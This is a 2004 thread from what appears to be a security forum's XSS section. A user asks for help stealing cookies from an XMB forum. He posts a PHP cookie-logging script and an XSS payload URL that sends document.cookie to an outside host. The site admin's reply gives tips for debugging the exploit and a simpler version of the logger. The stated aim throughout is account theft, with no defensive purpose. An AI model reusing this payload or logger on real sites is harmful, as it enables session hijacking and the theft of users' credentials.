| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 65 
  Members: 0 
  Total: 65 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | XMB XSS help |  |  
	| 
	
		|  Posted: Thu Sep 16, 2004 2:53 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| morrowasted |  | Regular user |  |  
  |  |  |  | Joined: Sep 06, 2004 |  | Posts: 10 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Okay, so I want to steal some cookies from an XMB forum. I've written a PHP script: 
 
  	  | Code: |  	  | <?
 
 $cook = $_GET['var'];
 $wow = fopen("log.txt", 'r');
 $w00t = fread($wow, filesize("log.txt"));
 echo $w00t;
 fclose($wow);
 
 $neat = fopen("log.txt", 'w');
 
 $var586 = $w00t . "\n\n" . $cook;
 $cool = fwrite($neat, $var586);
 
 fclose($neat);
 
 ?>
 
 | 
 
 Which seems to be working fine. The problem I'm having is crafting a workable URL. I tried http://host.com/post.php?action=newthread&fid=2&message="></textarea><script>document.location='http://www.bellaire.org/stuff/cookie.php?var='%20+document.cookie;</script>
 but that didn't work, it simply displayed a blank page.
 
 Anyone know how I can do this?
 |  |  
		| 
		
			| _________________
 I'm new to all this, sorry for my dumbness.
 |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Sep 19, 2004 8:39 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| There can be many reasons to exploit failure. Like patched version of the XMB forum. And "body onload" will not work on all browsers.
 So first step is to look at "html source" at the html page, where you
 trigger exploit. Look at code near the critical point and see, is there
 html code with right syntax or you must modify exploit to be working.
 
 By the way, your code can be more simple:
 
 
  	  | Code: |  	  | $cook = $_GET['var'];
 if(!empty($cook))
 {
 $fh = fopen('log.txt','ab');
 fwrite($fh,$cook."\n\n");
 fclose($fh);
 }
 
 | 
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Cross-site scripting aka XSS 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |